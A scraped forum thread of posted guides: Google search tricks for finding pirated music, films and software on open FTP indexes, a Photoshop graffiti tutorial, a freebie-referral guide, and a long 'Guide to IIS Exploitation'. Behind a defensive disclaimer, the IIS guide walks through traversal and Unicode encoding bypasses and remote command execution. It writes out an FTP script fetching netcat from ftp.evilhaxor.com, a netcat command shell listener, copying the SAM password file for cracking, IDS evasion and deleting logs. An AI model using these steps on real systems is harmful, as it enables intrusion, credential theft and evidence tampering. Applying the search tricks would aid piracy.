If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of mْsica" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook


Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

Master
29-04-07, 09:46
Graffiti On Walls 4 Adobe Photoshop Cs 8.0

Graffiti On Wall Tutorial For
Photoshop Cs 8.0

For This Tutorial You Must Have A Basic Understanding Of Adobe Photoshop Cs 8.0, Example : Where The Features Of The Program Are.
CODE

For This Tutorial You Will Need The Font Called Political Graffiti FIll Which Can Be Aquired Here:
Only the registered members can see the link

And

The Starting Wall Picture Which Can be Aquired Here:
Only the registered members can see the link





(1). Open Photoshop Cs 8.0

(2). Open Wall Picture

(3). Type Ur Second Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(4). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(5). Distort Style Squeeze Vertical, Bend = -31%, Horizontal Distortion = +18%, Vertical Distortion = +34%

(6). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(7). Type Ur First Name In Red At 210pt Font Size In The Political Graffiti Fill Font.

(8). Click Icon All The Way At The Topright That Looks Like A T With A Rounded Line Under It. (Warp Text)

(9). Distort Style Squeeze Vertical, Bend = +50%, Horizontal Distortion = 0%, Vertical Distortion = -31%

(10). Layer> Layer Style> Blending Options, General Blending> Opacity 79%> Fill Opacity 100%, Blend If: Gray, Underlying Layer Black 60, White 210

(11). Duplicate Both Layers

(12). Move Copied Layers One On Top Of The Other (In The Layer Menu)

(13). Hide The Original Ur Second Name And Ur First Name Layers By Clicking The Eye Icons So That They Dissapear.

(14). In The Copies, Right Click (One At A Time) And Click Rasterize Layer.

(15). Go to Layer> Merge Down (Ctrl + E) (On Top Name Layer).

(16). Layer> Layer Style> Stroke Change Color To Black, Size to 8, Then Opacity To 68%.

(17). Save If No Blur Effect Wanted

(18). Filter> Blur> Smart Blur> Mode: Overlay Edges, Threshhold 48%, Radius 6, Quality: High.

(19). Layer> New Layer

(20) Brush Tool (B), Paint Brush With The Soft 16pt Airbrush For Spraypaint Effect.

(21). Smuge Around Graffiti For Paint Smudge Look For Good Effect (Optional)

(22). Save.


Finito

Final Images:

CODE
Graffiti With Blur:
Only the registered members can see the link

Graffiti No Blur:
Only the registered members can see the link

Master
29-04-07, 09:46
Guide For Getting Free Stuff

Ok, if you are like me you have heard so much about the FreeIpods and FreeFlatScreens websites on different forums, blogs, IM's, etc, you are about to puke. So am I. But yet the draw of getting an Ipod for doing basically nothing is pretty strong. I dismissed all the "stories" of people getting their ipods as the marketing machine at work. However, when Kevin Rose published that not only did he receive his, but a few of his friends did as well, I figured I might take a chance and give it a go. Today I received proof that it does indeed work. Yep, I got my iPod.

Whats in it for them?
Step 1. Collect Names.
Step 2. Send those names items worth $200 or more
Step 3. ?????
Step 4. Profit

Before I signed up, I wanted to get to the bottom of the ?????. I didn't want any sweaty, filth pushing webmonkeys to have all my info, so I did my research. Gratis Internet, the parent company of the FreeIpods, FreeFlatscreens, etc. sites, recently did an interview with Wired Magazine.
In this article Gratis states that they are acting as Head Hunters for companies (more on that later) and are paid between $50-$90 per referral. Although this seems like a lot of money, this is nothing compared to what these companies spend for print advertising which does not guarentee ANY customers. So now we know what ?????? equals. ??????=$50-$90 for Gratis per guranteed customer (referral sites).

How Does it Work?
You sign-up on one (or more) of the following websites:

Only the registered members can see the link
This site gives away free Mini Macs. At the time of this writing only the 80gb MiniMac was available.

Only the registered members can see the link
This site gives away free flat screen monitors and TVs. At the time of this writing the following flat screens were available: Sony 19" LCD, Samsung 15" SyncMaster 510MP LCD TV, Samsung SyncMaster 710N LCD Monitor, Sony 27" FD Trinitron WEGA TV, or a 24" Toshiba TV/VCR/DVD combo

Only the registered members can see the link
This site gives away gaming systems. At the time of this writing the Slim PS2, Xbox, Nintendo Gamecube, and Nintendo DS were available.

Only the registered members can see the link
This site gives away high-end handbags. Might be a good surprise for your wife or girlfriend. =) At the time of this writing the following bags were available: Prada Mini-Hobo (black, Pink, Powder Blue), Burberry Novacheck Minisling, Coach Signature Demi Pouch (black, camel, purple), Kate Spade Pia Pochette (Black, Pink, Red)

Only the registered members can see the link
This site gives out free mp3 players. You can get paypal $275, ipod, rio carbon, iriver, ipod mini.

Only the registered members can see the link
This site gives away TiVo, Replay TV, and $275 paypal.

Only the registered members can see the link
Another mini mac site.

Only the registered members can see the link
This site is giving away high end digital cameras. At the the time of writing this, you follow cams are available: Canon Powershot S1 IS, Sony DSC-P100, Sony DSC-W1, Canon Powershot A95, $325 paypal.


Ok, so here is the tricky part. Once you sign up with one of these websites, you have to complete an "offer" from gratis's advertisers. There are numberous offers, some being better than others. Now remember the ???? = $50 - $90 equation? In order for you to receive your ipod/Flatscreen/Desktop PC/Handbag you have to refer 5, 8, or 10 of your friends, and they have to complete one of the offers as well. Then in order for them to receive theirs they need to refer others, and so on. So lets just look at why they are going to send an Ipod to you. (1(you) + 5(your friends)) x $90 = $540 - $250(ipod) = $290 profit for them just for you signing up. The advertisers are more than willing to pay, and FreeIpods is more than happy to send you your ipod. Works out for everyone.

What is the basic "lingo"?
"ref"/"referral" = The thing required to get your free items. These are your friends.
"green" = Status indicator that means your offer has been completed.
"yellow" = Status indicator that means your offer has yet to be completed or is in the process/pending.
"hold" = Means your account has been suspended or stopped. DON'T CHEAT.
"STV" = Means your product has been "Shipped To Vendor" You should recieve it in about 10 days time.

What process should you use to sign up (to ensure that you will get your item)
When signing up, it is recommended that you use Internet Explorer (sucks) some people have reported problems using other browsers (ex. Firefox, opera, etc.) Also make sure you have cookies accepted.

1. Click on one of the links above and enter a VALID US mailing address.

2. Complete the marketing survey - not your answers do not have any impact on you receiving your item. Just say no to them.

3. Once you have signed up, you should receive a verification email. If you did not receive one, go to the "My Account" page and click the link to have them resend it. If you still did not get it check your spam folder.

4. Sign-up with one of their partners and complete the offer. (see the section which offer should I choose) It can take up to 15 days for your offer to show completed. (A term that we freebie goers use for a "completed offer" is called "credit.") But usually they show completed after 24 hours. Be patient. If it doesn't show up as completed, you can email the site with proof and confirmation for signing up and they will give you credit.


Which offer should I choose?
Just so you know all offers require a credit card, **HOWEVER** not all of them cost anything! =) Here is a list of my recommended offers and I have not had any problems whatsover with doing these.

* Video Professor: This requires a credit card and pay only $3 shipping for computer tutorial CDs. After you receive the CDs, just call customer support and cancel your membership. Return to sender the CDs and they will refund you the shipping costs.

* Complete Home: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Lowes Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Buyer's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE $20 Circuit City Gift Card just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Great Fun: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Walkie Talkie just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* Traveler's Advantage: Instant verification. Sign up for their program for $1 two month trial. You get a FREE Thin Digital Camera just for doing this offer. Cancel your subscription within the 2 month trial and pay NOTHING and keep the gift card!

* eFax Plus: Sign up for their fax service. You get a 30 day free trial. Upon receiving credit for doing the offer, simply cancel the service within the free trial and pay nothing! It usually take 1-3 days to receive credit for this offer.

* Blockbuster Online: Try a two week trial of Blockbuster's Netflix-like service. Cancel online within trial time and pay nothing.

*Zooba: If you are a book fan, sign up for this offer. You get a book for $10 with free shipping. Instant verification.

*Various Credit Card offers: Apply for a credit card and get approved. When it arrives, cut it up and toss it out. Nothing to cancel, nothing to pay, and free stuff to gain!

Many of these offers are big companies, so you do not have to question the legitimacy for signing up under them. In other words, you will be safe because you are giving your credit card information to aol, blockbuster, and general motors, and i highly doubt that they will sell this info.

These are free, as long as you cancel within the trial period. Some offer online cancellations while others require calling their support number. Just tell them that you dont find yourself using their services enough so you want to cancel and they'll cancel your membership without any problems.

Cheating
Many of these free sites take cheating very seriously. If you want your free gift and not have you account suspended, simply DON'T CHEAT! Don't refer yourself and do all the offers yourself. If you think you can cheat the system because you are a 1337 h4x0r and you can use proxies and IP spoofs to refer yourself, DON'T DO IT. When you are in the approval stage, they will intensely throughly examine your account and make sure that all your referrels are legit and unique. Trust me, I know many people who have gotten suspended for attempting to cheat.

Multiple Accounts
This goes under cheating. It is wise not to create multiple accounts under the same site because it is against the free site's TOS. They suspend you no matter what your reason is, even if it was an accident. This also includes referring family members. You can only create one account under one household, under one IP address per site. So you cannot refer mother, sister, or brother to do it unless they live in another household.

So you've ran out of offers to do. What do I do?
Ok, if you are a freebie freak, you will probably eventually run out of offers to do because of the fact that you signed up for so many free sites did all the easy free offers. What shoud you do? Remember that free sites give you credit for a unique signup for the offers. So if you signed up for blockbuster online offer at freeflatscreens, you cannot do it again for another free site such as freedesktoppc. But there is a trick to this. A unique signup = a unique credit card that you used to sign up. So if you have a another credit card, you can sign up for the offer again. Another method is to purchase a visa gift card from your mall, or go to Only the registered members can see the link and purchase a virtual debit/credit card and do the offers with those.

If you followed all these steps correctly, your free gift will be delivered to your doorstep in no time.

Here are the steps:
1. Getting friends to sign up under you
2. Approval Stage: They will analyze your account for fraud. Takes 1 week.
3. Pending Stage: Your account have been approved. You are now processing. This will take 1-2 weeks.
4. STV: Sent to Vendor. Your product will arrive in 10 days.
5. Shipped: Congrats!

Most of these freebie sites are for U.S residents only.

Master
29-04-07, 09:47
************************************************** *************************
* Guide to IIS Exploitation *
* by fugjostle *
* *
* V.1.0.1 *
* *
* Questions? Comments? Email: fugjostle at ch0wn.com *
************************************************** *************************

Disclaimer: I do not condone hacking IIS servers in any way,
shape or form. This guide is intended as a guide
for admins to help them understand what most
script kiddies don't understand but are happy to
exploit.


--[On the first day, God created directory traversal]

Relative paths are the developers friend. They allow an entire website to
be moved to another directory without the need for changing all the links
in the html. For example, lets say we have a webpage called 'pictures.html'
in the htdocs dir:

Absolute path: /home/webpages/htdocs/pictures.html
Absolute path: /home/webpages/images/pic1.gif

In the html you can refer to the 'pic1.gif' via an absolute path shown
above or use a relative path:

Relative path: ../images/pic1.gif

The relative path tells the server that it has to go to the parent
directory (dot dot) --> from /home/webpages/htdocs to /home/webpages. Then
the server goes into the images dir and looks for the gif file to display.

Anyone who has used the 'cd' command in DOS and *nix should be familiar
with the operation. So what's the problem I hear you ask... well, the
programmers of web server didn't think to check the supplied URL to ensure
that the requested file was actually in the web directory. This allows
someone to backtrack through the servers directory structure and request
files that the web server has access to. For example,

Only the registered members can see the link

NB. you can also use double dots and double quotes. This is useful to evade
Intrusion Detection Systems (IDS):

Only the registered members can see the link

The webserver simply strips the extra stuff out and processes the request.
This is the same as the previous example and can make string matching IDS's
work for their money.


--[On the second day, God created Hexadecimal]

Once programmers started to realise the mistake they began to create parser
routines to check for naughty URL's and keep the requests within the
document root. Then along comes a wiley hacker who wonders if by encoding
the URL will it still be recognised by the parser routines.

You may have noticed that when you enter a URL that includes a space it is
replaced with the hex equivalent (%20):

Only the registered members can see the link index.html

becomes

Only the registered members can see the link

and voila, it works. So what would happen if we changed the now denied URL:

Only the registered members can see the link

to

Only the registered members can see the link

The parser routine checks for the existence of dots in the path and finds
none... the webserver then proceeds with the request.

An interesting feature is that you can encode the hex symbol and the web
server will decode it all for you. This is called the "double decode".
For example, given the URL "Only the registered members can see the link", the
following will take place:

(1) On the first decode, the string will be converted to:

"Only the registered members can see the link"

[%25 = '%' so '%252f' is decoded to '%2f']

(2) On the second decode, the string will be converted to:

"Only the registered members can see the link"

[%2f = '/']


--[On the third day, God created Unicode]

The World Wide Web is a global phenomenon and as such needs to be globally
interoperable. This raised the question of how to deal with all the different
character sets around the world. As a response to this, Unicode was created:

-----------------------------------------------------------------
Unicode provides a unique number for every character, no matter
what the platform, no matter what the program, no matter what
the language. The Unicode Standard has been adopted by such
industry leaders as Apple, HP, IBM, JustSystem, Microsoft,
Oracle,SAP, Sun, Sybase, Unisys and many others. Unicode is
required by modern standards such as XML, Java, ECMAScript
(JavaScript), LDAP, CORBA 3.0, WML, etc., and is the official
way to implement ISO/IEC 10646. It is supported in many operating
systems, all modern browsers, and many other products.
-----from Only the registered members can see the link


The problem with Unicode is that it requires 16 bits for a single character
and software tended to use 8 bits for a single character. Unicode TransForm
using 8 bits (UTF-8) was created. This allows for multibyte encoding where a
variable number of bytes can be used for each character:

Character 1-byte 2-byte 3-byte
. 2E C0 AE E0 80 AE
/ 2F C0 AF E0 80 AF
\ 5C C1 9C E0 81 9C

This lead to a new vulnerability in certain webservers. The parser didn't
understand this new encoding and allowed it through :-)

For example:

Only the registered members can see the link

Recent vulnerabilities have been taking advantage of the fact that the web
server doesn't understand the Unicode UTF-8 character set but the underlying
OS does:

Only the registered members can see the link

Understanding the distinction between Unicode and UTF-8 can be difficult. As
a general rule of thumb you can use the following format as a guide:

%uxxxx = Unicode
%xx%xx = UTF-8
%xx = Hexidecimal
%xxxx = Double Decode

--[On the fourth day, God created default installs]

IIS comes installed with various DLL's (Dynamic Link Libraries) that
increase the functionality of the web server. These ISAPI (Internet Server
API) applications allow programmers/developers to deliver more functionality
to IIS.

The DLL's are loaded into memory at startup and offer significant speed
over traditional CGI programs. For example, they can be combined with the
Internet Database Connector (Only the registered members can see the link) to create interactive sites that
use ODBC to access databases.

The problem is that some of these DLL's are insecure and are often installed
with sample scripts that demonstrate how to exploit, erm, I mean use them.

ASP.DLL is used to pre-process requests that end in ".asp". ASP (Active
Server Pages) are basically HTML pages with embedded code that is processed
by the webserver before serving it to the client.

Here's some examples to illustrate how the sample pages installed by default
can aid someone breaking into your site via the ASP.DLL:
[prefix all the examples with Only the registered members can see the link]

/default.asp.

** Appending a '.' to the URL can reveal the source
** on older systems. Remember hex encoding? You can
** also try using %2e to do the same thing.

/msadc/samples/adctest.asp

** This gives you an interface into the msadcs.dll
** and allows creation of DSN's. Read RFP's stuff
** for idea's on how to exploit this.

/iissamples/exair/howitworks/codebrws.asp?source=/msadc/Samples/../../.../../../../boot.ini
/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/../../../../.../boot.ini

** You can view the source of anything in the
** document root. '/msadc/' needs to be in the
** request as it is checked for, wait for this,
** security :-)

/index.asp::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the ASP.

/index.asp%81

** Append a hex value between 0x81 and 0xfe
** and you can reveal the source of any server
** processed file. This only works on servers
** that are Chinese, Japanese or Korean.

/AdvWorks/equipment/catalog_type.asp?ProductType=|shell("cmd+/c+dir+c:\")|

** This one allows you to execute remote
** shell commands ;-)

ISM.DLL is used to process requests that end in ".htr". These pages were used
to administer IIS3 servers. In IIS4 they are not used but various .htr samples
are installed by default anyway and offer another avenue for entry.

/index.asp%20%20%20..(220 more)..%20%20.htr

** IIS will redirect this request to ISM.DLL,
** which will strip the '.htr' extension and
** deliver the source code of the file.

/global.asa+.htr

** Does the same thing as the %20%20 exploit
** above. ISM.DLL strips the +.htr and delivers
** you the source of the file

/scripts/iisadmin/ism.dll?Only the registered members can see the link

** Excellent brute force opportunity if the
** dll exists. Successful logons will reveal
** lots of useful stuff.

/iisadmpwd/aexp.htr

** The iisadmpwd diectory contains several .htr
** files that allow NetBIOS resolution and
** password attacks.

/scripts/iisadmin/bdir.htr??c:\inetpub\www

** This method will only reveal directories
** but can be useful for identifying the
** servers structure for more advanced
** attacks later.

MSADCS.DLL is used to allow access to ODBC components via IIS using RDS
(Remote Data Service). RDS is part of the default install of Microsoft Data
Access Components (MDAC) and is a commonly exploited on IIS. It can allow
arbitrary shell commands to be executed with system privileges.

/msadc/msadcs.dll

** If this file exists then there's a pretty
** good chance that you can run the RDS
** exploit again the box. More on this later.

Only the registered members can see the link is the Internet Connector Database (IDC) and used when the web
server wants to connect to a database. It allows the creation of web pages
from data in the database, and it allows you to update/delete items from
within webpages. Pages with the extension '.idc' are sent to the Only the registered members can see the link
for processing.

/index.idc::$DATA

** Appending '::$DATA' to the URL can reveal
** the source of the IDC.

/anything.idc

** Requesting a non-existance file will
** reveal the location of the web root.

/scripts/iisadmin/tools/ctss.idc

** Creates a table based on the parameters it
** receives. Excellent place to look at for
** SQL injection.

SSINC.DLL is used for processing Server Side Includes (SSI). '.stm',
'.shtm' and '.shtml' extension are sent to the DLL which interprets
the SSI statements within the HTML before sending it to the client.

An example of SSI would be:

<!--#include file="news.txt"-->

This SSI tells the server to include the 'news.txt' in the final HTML
sent to the use. SSI statements are beyond the scope of this document
but offer another security hole open to our wiley hax0r. Ensure you
remove the app mapping and disable SSI if you do not require its
functionality.

SSINC.DLL is also vulnerable to a remote buffer overflow, read the
following advisory for details:

Only the registered members can see the link

Some examples of SSINC.DLL fun:

/anything.stm

** If you request a file that doesn't exist
** then the server error message contains the
** the location of the web root.

/somedir/anything.stm/somedir/index.asp

** Using this method allows you to view the
** the source code for index.asp.

IDQ.DLL is a component of MS Index Server and handles '.ida' and '.idq'
requests. This DLL has had some big exposure with the recent Nimda worm.
I'm not going into too much detail but '.ida' was used in a buffer
overflow that resulted in user defined code being executed on the server.

/anything.ida or /anything.idq

** Requesting a non-existance file will
** reveal the location of the web root.

/query.idq?CiTemplate=../../../boot.ini

** You can use this to read any file on
** the same drive as the web root

CPSHOST.DLL is the Microsoft Posting Acceptor. This allows uploads to your
IIS server, via a web browser or the Web Publishing Wizard. The existance of
this DLL can allow attackers upload files to the server. Other files such as
uploadn.asp, uploadx.asp, upload.asp and repost.asp are installed with Site
Server and allow upload of documents to the server:

/scripts/cpshost.dll?PUBLISH?/scripts/dodgy.asp

** If this file is there then you may be able
** to upload files to the server.

/scripts/uploadn.asp

** Connecting to this page gives you a nice
** gui for uploading your own webpages. You
** probably need to brute the userid.

There are lots more example scripts in the default install and quite a few
of them are very, very insecure. Microsoft recommends that you remove ALL
samples from any production server including the ExAir, WSH, ADO and other
installed samples.

IIS Default Web Site
--------------------
IISSAMPLES - c:\inetpub\iissamples
IISADMIN - c:\winnt\system32\inetsrv\issadmin
IISHELP - c:\winnt\help
SCRIPTS - c:\inetpub\scripts
IISADMPWD - c:\winnt\systems32\inetsrv\iisadmpwd
msadc - c:\program files\common files\system\msadc
logfiles - c:\winnt\system32\logfiles
default.htm - c:\inetpub\Only the registered members can see the link

IIS Default App Mapping
-----------------------
.asa - c:\winnt\system32\inetsrv\asp.dll
.asp - c:\winnt\system32\inetsrv\asp.dll
.cdx - c:\winnt\system32\inetsrv\asp.dll
.cer - c:\winnt\system32\inetsrv\asp.dll
.htr - c:\winnt\system32\inetsrv\ism.dll
.idc - c:\winnt\system32\inetsrv\Only the registered members can see the link
.shtm - c:\winnt\system32\inetsrv\ssinc.dll
.shtml - c:\winnt\system32\inetsrv\ssinc.dll
.stm - c:\winnt\system32\inetsrv\ssinc.dll


--[On the fifth day, God created Frontpage Extensions]

Microsoft Frontpage (Originally developed by Vermeer Tech Inc, if you've
ever wondered why they use _vti_) is a web design tool that helps you
create and maintain a web site and allows you to publish it to the web
server.

In order to publish using Frontpage the server needs to run certain
programs, collectively called the Frontpage Server Extensions.

Sounds good I hear you say, but there are many, many security holes in
Frontpage. You can list all the files, download password files and upload
your own files on Frontpage enabled sites.

When you publish a file, Frontpage attempts to read the following URL to
get all the information it needs to publish:

Only the registered members can see the link

Then Frontpage uses the following URL to POST the files to the site:

Only the registered members can see the link

It will come as no surprise that this file is not protected and open to
abuse.

All information for the site is stored in the /_vti_pvt/ dir, and its world
readable. Here's some of the things you can look for:

Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link


--[On the sixth day, God created CGI]--

The Common Gateway Interface (CGI) is a standard for interfacing external
applications to the web server. A CGI program is excuted in real time and
is used to create dynamic web sites.

Generally, the CGI programs are kept in '/cgi-bin/' but can be placed
anywhere. The programs can be written most languages but typically they are
written in C, Perl or shell scripts.

Many sites will use freely available, downloadable scripts from places like
Matt's Trojan, erm, I mean Matt's Script Archive. Its always a good idea to
look through the source of the scripts for bad system calls and lax input
validation.

CGI deserves a tutorial all to itself and I strongly suggest that you read
the following tutorials... they explain it better than I ever could:

Hacking CGI - Only the registered members can see the link
Perl CGI Problems - Only the registered members can see the link

Just to get you in the mood we will have a brief look at CGI exploitation.
There are three main types of CGI hacking; URL encoding attacks, input
validation exploits and buffer overflows.

The first thing to keep in mind is that you are already able to exploit cgi
using the techniques from previous sections. First, we need to cover some
background. CGI can take lots of shapes and forms. One popular use is via
web based forms that submit information to a CGI via a GET or POST.

<FORM NAME="myform" "METHOD=GET" ACTION="../cgi-bin/my_cgi.cgi">

When the user clicks on the submit button his information is passed to the
CGI script to process either via the URL (GET) or via HTTP headers (POST).
Lets assume that the CGI we are going to exploit asks the user for the name
of a file to display. The 'GET' method uses the URL to pass the information
and it would look like this:

Only the registered members can see the link

Lets break that down:

? - separates the request from the parameters
filename - this is the name of the textbox in the html
= - assignment for the parameter/value pair
/etc/passwd - this is what the user typed into the box

You can have multiple fields within a HTML form and these will also be
passed to the CGI. They are separated using a '&':

Only the registered members can see the link

If you were thinking how could you alter the user supplied input to break
the CGI then good, you're starting to think in terms of security. Lots of
developers love to program new and interesting things but they do not
consider security. A security conscious programmer would write input
validation routines that would process the data and ensure the user wasn't
be malicious or curious.

As you read through some of the free scripts on the web you will start to
realise that many programmers do not think about security. Lets look briefly
at some ways we could exploit the CGI. The first thing to keep in mind is
that you already know the generic exploits from the previous section. The
only area in which we are lacking is programming language specific info.

We will stick with the example cgi that open's a file (and let's assume
its written Perl). Lets look at some of the things we can try:

my_cgi.pl?filename=../../../../../etc/passwd

and lets do the same thing but encode the URL to bypass security checks:

my_cgi.pl?filename=../..%c0%af../..%c0%af../etc/passwd

If you have read the RFP document above then you will be familiar with
poison null bytes. Stop now and go read it... can't be arsed? ok then,
here's the quick version. %00 is valid in a string with Perl but is NUL
in C. So? When Perl wants to open the file it makes a request to the
operating system through a system call. The operating system is written in
C and %00 is a string delimiter. Lets apply this technique to the
following situation.

I decide to secure my CGI. I append '.html' to any request. This means that
the user can only view html files and if they try something else then it
doesn't exist. wh00p @ me :-)

But... what if I was to do the following:

my_cgi.pl?filename=../../../../etc/passwd%00

In Perl the filename string would look like this:

"../../../../etc/passwd\0.html"

Perfectly valid under Perl. I have done my job... or have I? When this is
passed to the OS (which is written in C not Perl) the request looks like
this:

"../../../../etc/passwd"

The OS identifies %00 as the string delimiter and ignores anything that
Comes after it. The webserver then displays the /etc/passwd file... bugger :-(

Many people download scripts from the web and look for problems in the
script. Then the wiley hax0r will go to altavista and search for sites
that are using that script, eg:

url:pollit.cgi

and good old altavista provides a list of sites that are just ripe for the
taking.

The final method of exploiting CGI is via buffer overflows. Languages like
Java and Perl are immune to buffer overflows because the language looks
after memory management. Programs written in a language such as C are
vulnerable because the programmer is supposed to manage the memory. Some
programmers fail to check the size of data it is fitting into the memory
buffer and overwrites data in the stack.

The goal of the buffer overflow is to overwrite the instruction pointer
which points to the location of the next bit of code to run. An attacker
will attempt to overwrite this pointer with a new pointer that points to
attacker's code, usually a root shell.

Quite a few CGI's exist that are vulnerable to this type of attack. For
Example, counter.exe is one such CGI. By writing 2000 A's to the CGI cause
a Denial of Service (DoS).

The details of buffer overflows are beyond the scope of this document.
Look out for a future release ;-)

If you want to dig deeper in buffer overflows then have a look at:

Only the registered members can see the link


--[On the seventh day, God chilled and haxored the planet]

Well.. I guess its time we actually tried some of the things discussed but
I'm not going to cover everything. I suggest going to the following URL's
and searching for IIS:

Only the registered members can see the link
Only the registered members can see the link

My main reason for doing this file was to better understand Unicode exploits
and so that is going to be the focus of the exploitation. The first exploit
I'm going to go through is the recent Unicode exploit for IIS4/5:

Only the registered members can see the link

Before I get emails saying 'hold on, you said that %xx%xx is UTF-8" let me
explain. This had wide exposure on Bugtraq as the Unicode exploit. In
reality, this is not a Unicode sploit but a UTF-8 sploit. I'm going to keep
calling this the Unicode exploit because its now referenced by this name in
the Bugtraq archives and you'll have to search using Unicode to do further
research.

Ok, rant over... To check if the server is exploitable, request the
following URL:

Only the registered members can see the link

You should get a directory listing of the C:\ drive on the target server.
The important thing to note is that the Unicode string can vary depending
where in the world you are. Some possible alternatives include:

%c1%1c %c0%9v %c0%af %c0%qf %c1%8s %c1%9c %c1%pc

There are many more to choose from, just look at some of the Bugtraq posts or
research UTF-8 for more alternatives.

OK, you can read the directory... what next? You have the directory listing
and the ability to run commands, so you need to find the web root. By default,
the web root is at:

c:\inetpub\Only the registered members can see the link

If its not there then go and look for it. Let's write a text file there and
see if we can see it:

cmd.exe?/c+echo+owned+>+c:\inetpub\Only the registered members can see the link

hmmm.. it seems that we don't have write access. Ok, no problem we can get
around that by creating a copy of the cmd.exe that has write privileges:

cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32 \fug.exe

Let's check if it worked:

Only the registered members can see the link

Yep.. all's good so far. Lets try and write to the web root:

fug.exe?/c+echo+owned+>+c:\inetpub\Only the registered members can see the link

Let's open up it up in the browser and see if we can see it:

Only the registered members can see the link

w00t!!! Write access!!! Right, we now have some options open to us. In the
words of Microsoft, where do you want to go today? Working via the URL is
pretty clunky and I like the comfort of a nice command prompt, So lets do
that. I want to bring over a copy of netcat and a nice html page that I'll
use to replace the existing one.

First I need to think about the script I want to run that will get the
files I need from my FTP server:

fugscript:
open ftp.evilhaxor.com
anonymous
anon@microsoft.com
cd pub
get nc.exe
get hacked.html
quit

Right. I need to get this script onto the webserver:

fug.exe?/c+echo%20open%20ftp.evilhaxor.com>fugscript
fug.exe?/c+echo%20anonymous>>fugscript
fug.exe?/c+echo%20anon@microsoft.com>>fugscript
fug.exe?/c+echo%20cd%20pub>>fugscript
fug.exe?/c+echo%20get%20nc.exe>>fugscript
fug.exe?/c+echo%20get%20hacked.html>>fugscript
fug.exe?/c+echo%20quit>>fugscript

OK.. now we have created a script on the server called fugscript. Next step
is to execute the script and get my files from my web server.

fug.exe?/c+ftp%20-s:fugscript

If all goes well the server should begin the FTP transfer and get your files
transferred. Be patient and give it time to transfer. Now you are ready to
get netcat listening on a port. The command line for starting netcat is:

nc.exe -l -p 6667 -e cmd.exe

This tells netcat to listen (-l) on port 6667 (-p) and to spawn cmd.exe (-e)
when someone connects. The last step is to translate this command into URL
speak ;-):

fug.exe?/c+nc.exe%20-l%20-p%206667%20-e%20cmd.exe

Fire up a telnet session and connect to port 6667 on the target system and
voila... you have a cmd prompt. I really hate web defacements... so if your
going to do it then rename the existing index.htm (or default.htm) to
something like index.htm.old (give the poor admin a break, cause you can bet
your arse that he hasn't made a backup). ALSO: you are now using a system
without authorisation and as such, you are guilty under the Computer Misuse
Act in the UK and probably of something similar in your own country. If it
never occurred to you to delete the contents of c:\winnt\system32\logfiles
or the 'fugscript' file then you really shouldn't be doing this.



It just wouldn't be right to talk about IIS exploitation without mentioning
msadc.pl. rfp's perl script is a perfect example of exploit chaining. A
single exploit is not used but a chain of exploits to get the script to
work.

The exploit utilises a combination of inadequate application input validation
and default install fun. The process tries to connect to a Data Source Name
(DSN) to execute commands.

rfp's script tests for the existence /msadc/msadc.dll using the GET method.
This test will be logged and you should edit the script to make it a HEAD
request and add some URL obfuscation madness.

The default msadc.pl script uses "!ADM!ROX!YOUR!WORLD!" as the MIME
separator string. It is advised to change this string as some IDS's are
configured to identify this string.

If you want to write your own scanners then you should be looking for
headers with the content type:

application/x-varg

and of course the IIS version :-) I don't want to go into too much detail
because this is heavily documented on rfp's site:

Only the registered members can see the link

How do I use it? I hear you cry... well, its child's play:

./msadc2.pl -h Only the registered members can see the link

If all goes well then you should be presented with the following:

command:

Its interesting to note at this point that 'cmd /c' will is run as with the
previous exploit. You can edit the script to run any other executable such
as 'rdsik /s' instead.

This is good, you can know enter the command you want to run on the server.
The previous Unicode exploit should have given you some ideas but here's a
couple that come to mind:

Example 1:
copy c:\winnt\repair\sam._ c:\inetpub\Only the registered members can see the link

(grabbing fug.hak via your browser should give you a nice file to fire up
in L0phtcrack or JTR)

Example 2:
echo open ftp.evilhaxor.com>fugscript && echo fug>>fugscript
&& echo mypassword>>fugscript... etc. etc.

Anyway, that's about all for now. When I can be bothered I'll add some more
methods to this file. Until then, ensure your box is fully patched and the
default scripts are removed. Go have a look at the following URL and get
secure:

Only the registered members can see the link

************************************************** *************************
Greetz to: ReDeeMeR, BarnseyBoy, Reeferman, gabbana, think12, Wang, Enstyne,
[502BOP], Muad_Dib, Macster, n0face, palmito, kph, Homicide, Col,
Axem, Booto, _Penguin, nsh, Chawmp, shad, hellz and everyone in
#CA who are way too numerous to mention.
************************************************** *************************

